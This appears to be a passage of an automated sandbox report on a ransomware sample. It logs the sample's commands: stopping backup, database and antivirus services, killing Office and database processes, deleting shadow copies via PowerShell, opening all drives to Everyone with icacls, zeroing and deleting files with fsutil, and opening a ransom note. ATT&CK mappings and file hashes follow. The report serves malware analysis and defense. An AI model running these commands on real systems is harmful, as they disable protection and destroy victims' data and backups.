C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
4⤵
PID:2104

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:5684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:3008

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
3⤵
PID:5740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
4⤵
PID:3192

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
3⤵
PID:5716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
4⤵
PID:3200

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
3⤵
PID:5760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
4⤵
PID:4708

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
3⤵
PID:5700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
4⤵
PID:2124

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
3⤵
PID:5692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
4⤵
PID:4724

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:5772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:548

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:5800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:1104

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:5808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:2604

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
3⤵
PID:5832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
4⤵
PID:816

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:5792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
4⤵
PID:4296

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
3⤵
PID:5784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
4⤵
PID:2172

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:5852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
4⤵
PID:4640

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
3⤵
PID:6088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
4⤵
PID:4316

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
3⤵
PID:6080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
4⤵
PID:3128

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
3⤵
PID:6004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
4⤵
PID:2052

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:5988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
4⤵
PID:4120

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
3⤵
PID:5980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
4⤵
PID:4348

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
3⤵
PID:5968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
4⤵
PID:3664

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
3⤵
PID:6128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
4⤵
PID:1204

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
3⤵
PID:5872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
4⤵
PID:3520

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
3⤵
PID:5864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
4⤵
PID:1964

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
3⤵
PID:6136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
4⤵
PID:3588

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
3⤵
PID:2260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
4⤵
PID:3932

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
3⤵
PID:1960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
4⤵
PID:436

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
3⤵
PID:2556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
4⤵
PID:2772

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
3⤵
PID:2468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
4⤵
PID:2004

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
3⤵
PID:3900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
4⤵
PID:2752

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:2200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
3⤵
PID:2972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
4⤵
PID:4340

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:2192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:340

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
3⤵
PID:2236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
4⤵
PID:3096

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
3⤵
PID:2496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
4⤵
PID:4624

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
3⤵
PID:2392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
4⤵
PID:3216

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
3⤵
PID:3716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
4⤵
PID:5132

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
3⤵
PID:3896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
4⤵
PID:3080

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
3⤵
PID:2648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
4⤵
PID:992

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:2592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:4672

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
3⤵
PID:3816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
4⤵
PID:3140

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
3⤵
PID:2596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
4⤵
PID:5848

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
3⤵
PID:2488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
4⤵
PID:5660

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
3⤵
PID:2464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
4⤵
PID:3392

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
3⤵
PID:5408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
4⤵
PID:4872

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
3⤵
PID:3680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
4⤵
PID:5496

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
3⤵
PID:2928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
4⤵
PID:5212

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
3⤵
PID:2976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
4⤵
PID:3844

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:3920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:5224

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
3⤵
PID:3740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
4⤵
PID:1616

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
3⤵
PID:2244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
4⤵
PID:3560

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:2288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
4⤵
PID:2312

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
3⤵
PID:2980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
4⤵
PID:3908

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
3⤵
PID:4008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
4⤵
PID:4652

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
3⤵
PID:3048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
4⤵
PID:2140

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
3⤵
PID:4440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
4⤵
PID:4812

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
3⤵
PID:2628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
4⤵
PID:4680

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4448

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
3⤵
PID:4004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
4⤵
PID:2040

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3180

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4744

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5148

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4172

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3684

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2652

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3144

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
3⤵
- Kills process with taskkill
PID:2456

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5116

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3448

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3696

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:4924

C:\Windows\SysWOW64\arp.exe
"arp" -a
3⤵
PID:5004

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.7.0.14
3⤵
PID:3692

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
3⤵
- Opens file in notepad (likely ransom note)
PID:4888

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
3⤵
PID:4648

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
4⤵
- Runs ping.exe
PID:5284

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
4⤵
PID:5268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
3⤵
PID:5288

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:2680

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1744241803-372518093325687806190007441810824515801220866-723192401-1530311840"
1⤵
PID:3876

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1046576538-1872979321-1065412311-1967862145-1344478990-14776131492707542263178418"
1⤵
PID:3884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1644793998325360721235798674956262868107478924093217418120516758431239723620"
1⤵
PID:3404

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1341723886-1280358762167757294-1112995355-1400152154-1671447947-450363871805574170"
1⤵
PID:4256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-410968294-2084018899-2091828538-76614229166169664014956158571738944846915729181"
1⤵
PID:4712

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2097479695-16051653755747020-2191705556590854833049755755397395831243883542"
1⤵
PID:4892

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1993345214-1331488504-115525649089855984410642296151088155815359369326-1763198085"
1⤵
PID:5076

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "177066310913284751335857577-1580953252-4189956381192789611-3553310371413663576"
1⤵
PID:2120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1403508438-1311843807892753941801623821-396527206292356000-1161770771245521805"
1⤵
PID:3264

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-231618600-599862205119714373114296742881317468974913061309-1461189076723979770"
1⤵
PID:2156

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "755445881918338705-1416833432-148151427510718764221239874304581560436-2144489810"
1⤵
PID:3100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1783136369-14477486717502646191857511969-192171473-1896275968-2130367147994677665"
1⤵
PID:4916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bfaf74-c48a-406b-812c-2684df821d22
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cb1d8a2a-0a5d-4447-82a9-91c5df6e0a3c
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadf780e-0f00-49bb-86e1-35585efd8a97
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
